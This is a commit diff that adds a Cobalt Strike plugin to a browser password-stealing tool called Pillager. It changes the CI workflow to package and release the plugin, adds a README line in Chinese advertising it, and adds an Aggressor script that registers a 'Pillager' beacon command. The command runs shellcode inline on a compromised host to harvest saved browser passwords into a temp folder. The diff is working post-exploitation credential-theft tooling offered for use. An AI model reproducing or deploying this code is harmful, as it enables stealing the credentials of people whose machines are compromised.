Update README.md

.github/workflows/main.yml

@@ -81,3 +81,25 @@ jobs:
         asset_path: ./Pillager.bin
         asset_name: Pillager.bin
         asset_content_type: application/octet-stream
+
+    - name: Install 7Zip PowerShell Module
+      shell: powershell
+      run: Install-Module 7Zip4PowerShell -Force -Verbose
+
+    - name: Copy Pillager.bin
+      run: copy .\Pillager.bin .\cs-plugin\module\Pillager.bin
+
+    - name: Pack Plugin Folder
+      shell: powershell
+      run: Compress-7Zip "cs-plugin" -ArchiveFileName "cs-plugin.zip" -Format Zip
+
+    - name: Upload Plugin Zip
+      id: upload-plugin-zip 
+      uses: actions/upload-release-asset@v1
+      env:
+        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+      with:
+        upload_url: ${{ steps.create_release.outputs.upload_url }}
+        asset_path: ./cs-plugin.zip
+        asset_name: cs-plugin.zip
+        asset_content_type: application/octet-stream

README.md

@@ -22,3 +22,5 @@
 ## 编译
 
 Release有Github Action自动编译的exe及shellcode，可以直接使用
+
+为了方便使用，Release附带了cs插件版本，使用Pillager命令即可执行

cs-plugin/browser.cna

@@ -0,0 +1,23 @@
+beacon_command_register(
+"Pillager", 
+"Get Browser Password", 
+"Usage: Pillager");
+
+alias Pillager {
+    $bid = $1;
+	$barch  = barch($bid);
+
+    $handle1 = openf(script_resource("module/scloader. $+ $barch $+ .o"));
+    $data1   = readb($handle1, -1);
+    closef($handle1);
+
+    $handle2 = openf(script_resource("module/Pillager.bin"));
+    $data2   = readb($handle2, -1);
+    closef($handle2);
+
+
+    $args   = bof_pack($bid, "b", $data2);
+    beacon_inline_execute($bid, $data1, "go", $args);
+    btask($bid, "Results can be found at %temp%\\Pillager");
+
+}